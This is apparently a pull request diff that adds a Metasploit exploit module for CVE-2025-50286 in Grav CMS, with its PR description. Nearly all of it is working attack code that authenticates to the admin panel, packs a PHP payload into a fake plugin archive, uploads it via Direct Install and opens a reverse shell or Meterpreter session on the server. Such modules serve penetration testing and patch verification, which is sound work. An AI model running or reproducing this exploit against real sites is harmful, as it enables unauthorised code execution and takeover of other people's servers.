+        'Arch' => ARCH_PHP,
+        'Targets' => [
+          [
+            'PHP Payload',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base path', '/']),
+        OptString.new('USERNAME', [true, 'Admin username']),
+        OptString.new('PASSWORD', [true, 'Admin password']),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'admin'),
+      'keep_cookies' => true
+    )
+    return CheckCode::Unknown('Connection failed') unless res
+
+    html = res.get_html_document
+    return CheckCode::Unknown('Could not parse HTML') unless html
+
+    return CheckCode::Safe('Target does not appear to be a Grav installation') unless grav_installation?(html)
+
+    return CheckCode::Detected('Grav detected but login form not accessible') unless login_form_present?(html)
+
+    version_str = get_version_after_login
+    unless version_str
+      return CheckCode::Detected('Grav CMS detected but version could not be determined')
+    end
+
+    version = Rex::Version.new(version_str.gsub('-', '.'))
+
+    if version < Rex::Version.new('1.8.0.beta.27')
+      return CheckCode::Appears("Grav CMS #{version_str} is vulnerable")
+    end
+
+    CheckCode::Safe("Grav CMS #{version_str} is patched")
+  rescue ArgumentError
+    CheckCode::Detected("Grav CMS detected, version parsing failed: #{version_str}")
+  rescue ::Rex::ConnectionError
+    CheckCode::Unknown('Connection failed')
+  end
+
+  def exploit
+    print_status('Authenticating to Grav admin...')
+    login
+
+    plugin_name = Rex::Text.rand_text_alphanumeric(12).downcase
+    zip_data = build_plugin_zip(plugin_name)
+
+    print_status('Uploading plugin via Direct Install...')
+    upload_plugin(zip_data, plugin_name)
+
+    handler
+    register_files_for_cleanup("user/plugins/#{plugin_name}plugin/#{plugin_name}plugin.php")
+    register_dir_for_cleanup("user/plugins/#{plugin_name}plugin")
+  end
+
+  def grav_installation?(html)
+    grav_checks = [
+      html.at('//*[@data-gpm-grav]'),
+      html.at('//*[@data-grav-field]'),
+      html.at('//*[@data-grav-disabled]'),
+      html.at('//*[@data-grav-default]')
+    ]
+
+    grav_checks.count { |elem| !elem.nil? } >= 2
+  end
+
+  def login_form_present?(html)
+    username_input = html.at('input[@name="data[username]"]')
+    password_input = html.at('input[@name="data[password]"]')
+
+    username_input && password_input
+  end
+
+  def get_version_after_login
+    result = authenticate
+    return nil unless result == :success || result == :already_authenticated
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'admin'),
+      'keep_cookies' => true
+    )
+    return nil unless res && res.code == 200
+
+    html = res.get_html_document
+    return nil unless html
+
+    version_elem = html.at('span.grav-version')
+    return nil unless version_elem
+
+    version_elem.text.strip
+  end
+
+  def authenticate
+    res = send_request_cgi!(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'admin'),
+      'keep_cookies' => true
+    )
+    return :connection_failed unless res
+
+    html = res.get_html_document
+    return :connection_failed unless html
+
+    nonce = html.at('input[@name="login-nonce"]/@value')
+    return :already_authenticated if nonce.nil? && html.at('span.grav-version')
+    return :connection_failed unless nonce
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'data[username]' => datastore['USERNAME'],
+        'data[password]' => datastore['PASSWORD'],
+        'task' => 'login',
+        'login-nonce' => nonce.text
+      }
+    )
+    if [302, 303].include?(res.code)
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'admin'),
+        'keep_cookies' => true
+      )
+      return :connection_failed unless res
+    end
+
+    return :login_failed if res.body.include?('name="login-nonce"')
+
+    :success
+  end
+
+  def login
+    print_status('Authenticating...')
+    result = authenticate
+    case result
+    when :already_authenticated
+      print_good('Already authenticated')
+    when :success
+      print_good('Login successful')
+    when :connection_failed
+      fail_with(Failure::Unreachable, 'Connection failed')
+    when :login_failed
+      fail_with(Failure::NoAccess, 'Login failed')
+    else
+      fail_with(Failure::UnexpectedReply, 'Unexpected authentication error')
+    end
+  end
+
+  def build_plugin_zip(plugin_name)
+    php_code = generate_php_plugin(plugin_name)
+
+    zip = Rex::Zip::Archive.new
+    zip.add_file("#{plugin_name}plugin/", '')
+    zip.add_file("#{plugin_name}plugin/#{plugin_name}plugin.php", php_code)
+    zip.add_file("#{plugin_name}plugin/blueprints.yaml",
+                 "name: #{plugin_name.capitalize}\ntype: plugin\nversion: 1.0.0\ndescription: Cute plugin\nform:\n fields: []")
+    zip.add_file("#{plugin_name}plugin/#{plugin_name}plugin.yaml",
+                 "enabled: true\ntext_var: Text by **#{plugin_name.capitalize} Plugin** plugin")
+    zip.pack
+  end
+
+  def generate_php_plugin(plugin_name)
+    encoded_payload = payload.encoded
+    <<~PHP
+      <?php
+      namespace Grav\\Plugin;
+      use Grav\\Common\\Plugin;
+
+      class #{plugin_name.capitalize}pluginPlugin extends Plugin
+      {
+          public static function getSubscribedEvents()
+          {
+              return [
+                  'onPagesInitialized' => ['onPagesInitialized', 0]
+              ];
+          }
+          public function onPagesInitialized()
+          {
+              chmod(__DIR__, 0777);
+              #{encoded_payload}
+          }
+      }
+    PHP
+  end
+
+  def build_multipart_body(boundary, nonce, zip_data, plugin_name)
+    parts = []
+
+    parts << "--#{boundary}\r\n" \
+             "Content-Disposition: form-data; name=\"task\"\r\n\r\n" \
+             "directInstall\r\n"
+
+    parts << "--#{boundary}\r\n" \
+             "Content-Disposition: form-data; name=\"admin-nonce\"\r\n\r\n" \
+             "#{nonce}\r\n"
+
+    parts << "--#{boundary}\r\n" \
+             "Content-Disposition: form-data; name=\"uploaded_file\"; filename=\"#{plugin_name}.zip\"\r\n" \
+             "Content-Type: application/zip\r\n\r\n" \
+             "#{zip_data}\r\n"
+
+    parts.join + "--#{boundary}--\r\n"
+  end
+
+  def upload_plugin(zip_data, plugin_name)
+    install_uri = normalize_uri(target_uri.path, 'admin', 'tools', 'direct-install')
+
+    res = send_request_cgi('method' => 'GET', 'uri' => install_uri, 'keep_cookies' => true)
+    fail_with(Failure::Unreachable, 'No response fetching install page') unless res
+
+    nonce = res.body.match(/name="admin-nonce"\s+value="([^"]+)"/)&.captures&.first
+    fail_with(Failure::UnexpectedReply, 'Could not extract admin nonce') unless nonce
+
+    boundary = "----RubyFormBoundary#{Rex::Text.rand_text_alphanumeric(16)}"
+    post_body = build_multipart_body(boundary, nonce, zip_data, plugin_name)
+
+    res2 = send_request_cgi(
+      'method' => 'POST',
+      'uri' => install_uri,
+      'keep_cookies' => true,
+      'ctype' => "multipart/form-data; boundary=#{boundary}",
+      'data' => post_body
+    )
+    fail_with(Failure::Unreachable, 'No response during plugin upload') unless res2
+
+    if [301, 302, 303].include?(res2.code)
+      vprint_status("Upload redirected (#{res2.code}), following...")
+      send_request_cgi('method' => 'GET', 'uri' => install_uri, 'keep_cookies' => true)
+    end
+
+    res2
+  end
+end


### PR DESCRIPTION
# Description

This PR introduces a new exploit module for CVE-2025-50286, an authenticated Remote Code Execution vulnerability in Grav CMS via the Admin panel’s Direct Install plugin functionality.

The vulnerability allows an authenticated admin user to upload and install a malicious plugin archive, resulting in arbitrary PHP code execution on the target server.


## Vulnerability Details

- CVE: `CVE-2025-50286`
- EDB: `52402`
- Attack Vector: Authenticated
- Impact: Remote Code Execution
- Affected Component: Admin plugin Direct Install feature

The vulnerability arises because the Direct Install functionality does not sufficiently validate uploaded plugin archives. An attacker can upload a crafted plugin containing arbitrary PHP code which will be written to:

`user/plugins/<plugin_name>/<plugin_name>.php`

Upon installation, the malicious PHP file is loaded and executed by Grav.


## Module Capabilities:

- Authenticates to the Grav Admin panel
- Generates a malicious plugin ZIP archive
- Uploads it via the Direct Install endpoint
- Triggers execution
- Cleans extracted artifacts
- Establishes a Meterpreter session


## Test Environment:

- Grav CMS v1.7.48, v1.7.49.5 
- Admin plugin v1.10.48, v1.10.49.3


## Exploitation Flow

- Authenticate via /admin
- Obtain authenticated session
- Generate malicious plugin archive
- Upload via Direct Install endpoint
- Plugin is extracted to: `user/plugins/<randomized_plugin_name>/`
- Payload executed
- Payload plugin dir is removed
- Reverse shell established

---

The module is Rubocop & Msftidy compliant.

---